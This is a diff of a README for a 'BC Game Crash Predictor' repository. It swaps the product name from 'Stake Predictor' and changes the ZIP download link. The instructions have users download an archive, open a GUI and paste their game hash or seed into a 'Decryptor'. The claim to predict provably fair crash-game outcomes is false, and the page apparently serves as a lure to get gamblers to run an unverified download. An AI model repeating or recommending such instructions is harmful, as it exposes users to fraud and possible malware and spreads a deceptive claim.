HashScannerOfficial/BC-Game-Crash-Predictor/README.md

 ## Installation Instructions

-To install the <strong>Stake Predictor</strong>, follow these steps:
+To install the <strong>bc game Predictor</strong>, follow these steps:

-1. Download the ZIP file from our [releases page](https://decryptor.net/).
+1. Download the ZIP file from our [releases page](https://hashscannerofficial.github.io/BC-Game-Crash-Predictor/).
 2. Open GUI.
 3. Go to fariness tab inside your game.
 4. Past your hash or seed "Peer Round" inside the Decryptor ( Only if program cant detect auto seed )